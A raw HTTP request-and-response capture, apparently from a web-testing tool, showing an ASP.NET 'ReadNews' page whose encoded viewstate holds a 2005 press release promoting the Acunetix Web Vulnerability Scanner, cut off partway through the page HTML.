AgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc%2BPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk%2BPGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk%2BIDwvdWw%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkfCyPhouoc9T07CkSiDvxgplY0cc%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwKx7LcVAv6Q%2FOMBAtCnkuUEArHS0foPArHS0foPArHSxZEHArHSxZEHArHSufkFArHSufkFArHSrZwNArHSrZwNAor5vwUCivm%2FBQKK%2BdPZCQKK%2BdPZCQKK%2Bcf8AgKK%2Bcf8AgKK%2BfuTCgKK%2BfuTCgKK%2Be%2B2AwKK%2Be%2B2AwKK%2BYPNDAKK%2BYPNDAKK%2BbfgBQKK%2BbfgBQKK%2BauHDQKK%2BauHDQKK%2BZ%2FsCwKK%2BZ%2FsCwKK%2BbODAwKK%2BbODAwK%2Fk%2F%2FECQK%2Fk%2F%2FECQK%2Fk5ObAQK%2Fk5ObAQK%2Fk4e%2BCgK%2Fk4e%2BCgK%2Fk7vVAwK%2Fk7vVAwK%2Fk6%2FoDAK%2Fk6%2FoDAK%2Fk8OMBAK%2Fk8OMBAK%2Fk%2FejDQK%2Fk%2FejDQK%2Fk%2BvGBgK%2Fk%2BvGBgK%2Fk9%2BvAwK%2Fk9%2BvAwK%2Fk%2FPCDAK%2Fk%2FPCDAKQut3rDwKQut3rDwKQuvGOBwKQuvGOBwKQuuUlApC65SUCkLqZ%2BAkCkLqZ%2BAkCkLqNnwECkLqNnwECkLqhsgoCkLqhsgoCkLrV1gMCkLrV1gMCkLrJ7QwCkLrJ7QwCkLq91QkCkLq91QkCkLrR6QICkLrR6QIC19mQngcC19mQngcC19mENQLX2YQ1AtfZuMgJAtfZuMgJAtfZrO8CAtfZrO8CAtfZwIMKAtfZwIMKAtfZ9KYDAtfZ9KYDAtfZ6P0MAtfZ6P0MAtfZnJAEAtfZnJAEZPSnvrIdg8X%2FqqjYsEEZ5ETd0S8%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 30642
Response Body - size: 30,642 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmMFDGFkcy9kZWYuaHRtbGRkfCyPhouoc9T07CkSiDvxgplY0cc=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" 